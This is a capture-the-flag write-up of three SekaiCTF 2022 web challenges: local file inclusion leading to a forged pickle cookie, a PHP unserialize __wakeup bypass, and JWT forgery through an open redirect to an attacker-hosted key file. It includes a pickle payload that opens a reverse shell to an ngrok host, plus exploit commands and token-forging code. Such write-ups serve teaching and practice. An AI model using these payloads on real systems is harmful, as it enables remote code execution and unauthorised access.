---
title: "Sekai 2022"
date: 2022-10-03T00:26:39+02:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - Deserialization
    - JWT
---

# SekaiCTF 2022

Name | Category |  CTF Time
------------|----------|---- 
**SekaiCTF 2022**| **Web** |  **https://ctftime.org/event/1619**

# [*] INDEX:

- [Bottle Poem](#bottle-poem---web)
- [Sekai Game Start](#sekai-game-start---web)
- [Issues](#issues---web)

## Bottle Poem - Web 

```
Difficulty : Easy 🌔
Points : 100
```

In this site we can find some poems : 

![<- Not working](/static/HACKING/sekai-2022-1.png)

The id parameter is actually vulnerable against LFI as we can confirm in the next screenshot :

![<- Not working](/static/HACKING/sekai-2022-2.png)

As the name says, bottle is a pythom framework so let's get the source code getting `app.py` :

![<- Not working](/static/HACKING/sekai-2022-3.png)

Didn't work... but we can use `/proc/self/cwd/` to point to the current directory, let's try with `/proc/self/cwd/app.py`:

![<- Not working](/static/HACKING/sekai-2022-4.png)

Nice! It worked! The source code :

```py
from bottle import route, run, template, request, response, error
from config.secret import sekai
import os
import re


@route("/")
def home():
    return template("index")


@route("/show")
def index():
    response.content_type = "text/plain; charset=UTF-8"
    param = request.query.id
    if re.search("^../app", param):
        return "No!!!!"
    requested_path = os.path.join(os.getcwd() + "/poems", param)
    try:
        with open(requested_path) as f:
            tfile = f.read()
    except Exception as e:
        return "No This Poems"
    return tfile


@error(404)
def error404(error):
    return template("error")


@route("/sign")
def index():
    try:
        session = request.get_cookie("name", secret=sekai)
        if not session or session["name"] == "guest":
            session = {"name": "guest"}
            response.set_cookie("name", session, secret=sekai)
            return template("guest", name=session["name"])
        if session["name"] == "admin":
            return template("admin", name=session["name"])
    except:
        return "pls no hax"


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    run(host="0.0.0.0", port=8080)
```

We can also get the secret code :

```py
from config.secret import sekai
```

With `http://bottle-poem.ctf.sekai.team/show?id=../../../../proc/self/cwd/config/secret.py` : 

```py
sekai = "Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu"
```

With this we can create any cookie we want :

```py
session = request.get_cookie("name", secret=sekai)
```

After a little research about what does bottle do with the cookies we find with [this documentaion](https://bottlepy.org/docs/dev/bottle-docs.pdf)

![<- Not working](/static/HACKING/sekai-2022-5.png)

We have access to the secret key, so we actually can craft our malicious pickle payload to reach RCE. So let's craft it :

```py
from bottle import route, run, template, request, response, error
import os

sekai = "Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu"

class RCE:
    def __reduce__(self):
        return os.system, ('bash -c "bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13316 0>&1"', )



@route('/craft_cookie')
def craft_cookie():
    response.set_cookie("name", RCE(), secret=sekai)


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    run(host="0.0.0.0", port=8080)
```

Now we visit `http://localhost:8080/craft_cookie`, get the cookie and paste it in the bottle-poem site :

![<- Not working](/static/HACKING/sekai-2022-6.png)

> SEKAI{W3lcome_To_Our_Bottle}

But, let's go deeper into the vulnerability, what's really happening? If we go to bottle's source code we can find this :

```py
    def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
        """ Return the content of a cookie. To read a `Signed Cookie`, the
            `secret` must match the one used to create the cookie (see
            :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
            cookie or wrong signature), return a default value. """
        value = self.cookies.get(key)
        if secret:
            # See BaseResponse.set_cookie for details on signed cookies.
            if value and value.startswith('!') and '?' in value:
                sig, msg = map(tob, value[1:].split('?', 1))
                hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
                if _lscmp(sig, base64.b64encode(hash)):
                    dst = pickle.loads(base64.b64decode(msg))
                    if dst and dst[0] == key:
                        return dst[1]
            return default
        return value or default
```

So every time that `get_cookie` is called, pickle will be deserializing the msg :

```py
dst = pickle.loads(base64.b64decode(msg))
```

## Sekai Game Start - Web

```
Difficulty : Medium 🌓
Points : 250
```

We have the following php code :

```php
<?php
include('./flag.php');
class Sekai_Game{
    public $start = True;
    public function __destruct(){
        if($this->start === True){
            echo "Sekai Game Start Here is your flag ".getenv('FLAG');
        }
    }
    public function __wakeup(){
        $this->start=False;
    }
}
if(isset($_GET['sekai_game.run'])){
    unserialize($_GET['sekai_game.run']);
}else{
    highlight_file(__FILE__);
}

?>
```

This might seem easy, but it's not so obvious. In the first place we have to send the serialized object through GET parameter, but when we're dealing with PHP, dots are converted to underscores. In PHP a variable name can only contain alpha-numeric characters and underscores, otherwise it will be converted into a underscore. So for example `[` will be converted to `_`, in that case `.` won't be converted to `_`. All this parsing happends due to a old PHP version, we can input the object using `?sekai[game.run=`.

But now we have the second problem, as we can see the `__wakeup()` function will set `start` to False, and if it's false the flag won't be shown to us. After some googling I came across with [this post about PHP `__wakeup` bypass](https://bugs.php.net/bug.php?id=81151). 

When the class doesn't implement Serializable, maybe unserializing it *SHOULD* return an Error. But in this case "C:" means a class implements Serializable, and it don't support `__wakeup`. At here, the class doesn't implements Serializable, `__wakeup` ineffective, `__destruct` works.

Final payload : `?sekai[game.run=C:10:"Sekai_Game":0:{}`

```
curl -g http://sekai-game-start.ctf.sekai.team/?sekai[game.run=C:10:%22Sekai_Game%22:0:{}

<br />
<b>Warning</b>:  Class Sekai_Game has no unserializer in <b>/var/www/html/index.php</b> on line <b>15</b><br />
Sekai Game Start Here is your flag SEKAI{W3lcome_T0_Our_universe}
```

> SEKAI{W3lcome_T0_Our_universe}


## Issues - Web

```
Difficulty : Hard 🌒
Points : 356
```

This challenge has a white-box approach, if we look at the api we can notice that we have to use an authorized JWT :

```py
@api.before_request
def authorize():
    if "Authorization" not in request.headers:
        raise Exception("No Authorization header found")

    authz_header = request.headers["Authorization"].split(" ")
    if len(authz_header) < 2:
        raise Exception("Bearer token not found")

    token = authz_header[1]
    if not authorize_request(token):
        return "Authorization failed"


f = open("flag.txt")
secret_flag = f.read()
f.close()


@api.route("/flag")
def flag():
    return secret_flag
```

But how is this JWT configured? Let's have a look to the authorization function :

```py
def authorize_request(token):
    pubkey_url = get_public_key_url(token)
    if has_valid_alg(token) is False:
        raise Exception("Invalid algorithm. Only {valid_algo} allowed.".format(valid_algo=valid_algo))

    pubkey = get_public_key(pubkey_url)
    pubkey = "-----BEGIN PUBLIC KEY-----\n{pubkey}\n-----END PUBLIC KEY-----".format(pubkey=pubkey).encode()
    decoded_token = jwt.decode(token, pubkey, algorithms=["RS256"])
    if "user" not in decoded_token:
        raise Exception("user claim missing")
    if decoded_token["user"] == "admin":
        return True

    return False
```

In the first place this function gets the public key to decode the JWT, and yes, I said *decode*, the token is being decoded but no verified (for this the server should be using the `jwt.verify` function to decode and verify the token). Let's investigate a little more about the authorization, where is the public key from?

```py
def get_public_key_url(token):
    is_valid_issuer = lambda issuer: urlparse(issuer).netloc == valid_issuer_domain

    header = jwt.get_unverified_header(token)
    if "issuer" not in header:
        raise Exception("issuer not found in JWT header")
    token_issuer = header["issuer"]

    if not is_valid_issuer(token_issuer):
        raise Exception(
            "Invalid issuer netloc: {issuer}. Should be: {valid_issuer}".format(
                issuer=urlparse(token_issuer).netloc, valid_issuer=valid_issuer_domain
            )
        )

    pubkey_url = "{host}/.well-known/jwks.json".format(host=token_issuer)
    return pubkey_url
```

The server checks the netloc of the issuer in the JWT header, and if it's valid (in this case it should be `http://localhost:8080/`) then the public key to decode the token will be  `"{host}/.well-known/jwks.json".format(host=token_issuer)`. So our first step will be bypassing this netloc restriction and then using our own public key to verify our own-crafted JWT.

After another look to the application we realize that it's vulnerable to open redirection :

```py
@app.route("/logout")
def logout():
    session.clear()
    redirect_uri = request.args.get('redirect', url_for('home'))
    return redirect(redirect_uri)
    
```

We can redirecto to our server using `http://issues/logour?redirect=http://ourhost/`, and using this the netloc restriction will be bypassed. So now we just have to generate a RSA keys :

```bash
openssl genrsa -out private.pem 4096 # Generate private key
openssl rsa -in private.pem -out public.pem -pubout # Generate the public key from earlier generated private key
```

Now we have to encode our jwt :

```py
import jwt
private_key = open("private.pem").read().strip()

encoded = jwt.encode({"user": "admin"}, private_key, algorithm="RS256",headers={"issuer":"http://localhost:8080/logout?redirect=https://8da1-88-22-77-96.eu.ngrok.io"})
print(encoded) 
```

Make sure to paste the public key value to the jwks.json :

```json
{
    "keys": [
        {
            "alg": "RS256",
            "x5c": [
                "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvaTI+frnVum/2TWqZy8lryI5f0+n8hulPPsmxi3eI/fEGX2A0DjEAvqEcWl4umqL/Zuv1P7cob2z/zkmOrgBlEi0kf5pvaLkIsvvve/zz5xGptzuEDJKgk32UKw2bV5XWcPLaOFBZxiR28DeZaLycSS1NicEYcjxGHayYC4qobeZI6BAosDlxinyuwW2WxVKoPagH2Fxamowe/Zsr95LujwLGaVYKSNLse1i+DnVNiqI07avo6cF1kKJuc6WqoIA1l7RgIB+oETzR9llVQVy0Reavu48g2sDn6nI8JTVO7t/XPiIcUN3x35+UIfHKvNfwCbVaID+Rh28QAS9tc6p20ACx128e7dmCWzPB8NPge+FD3xQtSRqLH0odDHzCsciO3i6pMYTu7CMSAeGzCjUSHvrxMh8PZSKE3kPGVNcBOua7lVRi/ZzRuInnvAJCS0JxJJvPI4mmB1AT80W5L5Fk2YSEHF9MNrIjEtnRzVnLSc0u8oBOERq77zlgCYZvVEjCZ51g8+ehLLboAnz8eiwvGBxXoLtTCgzLKoJ4RtnbyNEC6ytHR2eoJdFReOKGkbHWblcDv1TU92s3cNoo5oeONJhVf629W7Hdg0JiFOkHTsExjuqZO6zJdrhFQf78vJ5V6mHynCiMU97eDMhy5RAzC86m1s7sjcSx7kty7/2QNUCAwEAAQ=="
            ]
        }
    ]
}
```

This must be placed into `.well-known/jwks.json`. Open our web server, in my case I used python&ngrok :

![<- Not working](/static/HACKING/sekai-2022-7.png)

> SEKAI{v4l1d4t3_y0ur_i55u3r_plz}
